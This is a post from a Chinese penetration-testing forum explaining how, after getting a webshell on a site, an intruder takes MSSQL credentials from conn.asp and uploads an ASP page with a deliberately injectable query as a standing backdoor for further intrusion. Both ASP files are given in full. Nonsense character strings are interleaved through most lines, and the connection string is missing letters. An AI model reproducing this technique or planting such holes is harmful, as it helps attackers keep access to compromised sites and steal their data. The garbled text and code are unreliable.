中国网络渗透测试联盟

标题: 自己构造注入点方便入侵 [打印本页]

作者: admin    时间: 2012-9-13 17:27
标题: 自己构造注入点方便入侵
自己构造注入点方便入侵+ ^( C9 q8 C  h  g, F5 b3 C4 d

; o# W' T1 H( y7 ^今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
5 Z; b3 _' O" A& ~) B- i. b; U" C5 T4 A3 _7 ^+ V( Z1 K
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
5 ^6 d3 I1 e- m+ K0 p! L  P; L
% I  ~  r" c! @4 |1 q& ^/ q首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和) J2 G5 V' f6 ?: E$ g
! I0 r. _# R; F( m
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表+ ~( `" E2 B/ U# U5 B/ t
7 P  _, R  r. G  v9 w9 w* T4 C# e
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:3 e  N! o9 F  t* Y, Z
% f! ^6 v' a+ e0 o
程序代码
8 n) P; B9 s( O" S<!--#include file="xx.asp"-->
8 Z: d) p8 U/ |; {! x' u" T<%+ _3 d( g4 e. I8 L$ E' S8 j) H
set rs=server.createobject("ADODB.recordset")
" ~" _0 L+ l) ^& mid = request("id")
0 m5 {1 T# b9 VstrSQL = "select * from admin where id=" & id
3 c& m2 ~( J2 S& S& p# z( Y; T$ wrs.open strSQL,conn,1,3+ i1 Z; b# c# C4 F0 a5 W
rs.close) z% J" F6 V$ F* @
%>6 G' J; H! j( X$ }

, o& }' k  C% v9 L4 H7 m把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
% ~( K) ?+ L; [5 U, J5 Z8 i3 `4 l; C1 ?) t3 ]% T2 Z" L& g
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!0 L; U8 Z7 L" h! _7 h$ V# K

' y' T0 [" u& m9 c" v然后就要构造一个连接数据库的文件了,代码如下:# E6 O* b( `3 i8 _5 t
程序代码
8 A/ ^; _9 ^- C# }<%        
: X0 o- T4 X3 q0 S: y. d& A7 HstrSQLServerName = "000.000.000.000"     '服务器名称或地址
2 W1 w0 c0 [, u# _  T) Y, ?& AstrSQLDBUserName = "sqlname"         '数据库帐号
! e! t! Q/ {! d* l- `- E! ystrSQLDBPassword = "sqlpass"         '数据库密码, i9 H+ I. `2 T6 M
strSQLDBName = "sqldataname"           '数据库名称
6 m- C6 p. a4 x9 PSet conn = Server.CreateObject("ADODB.Connection")
) e1 i1 F- {' ~strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"" Y: o  Z) G4 n& m
conn.open strCon/ v( l  V( E- m' Z# z* t3 ~' e
%>
) q3 W1 d7 N% `* e' m% J* }6 ]6 ]8 k: t, z9 @
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
# U2 U2 n& ]" V9 ?2 b' {: l8 B8 a* Q& `  V
就这样,正常情况下,就OK了,伪造成功……
+ b3 a. o5 U. `. K4 c
9 Y* p& P! `3 X1 ?5 Z           如果有什么问题可以提出来大家一起探讨解决。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2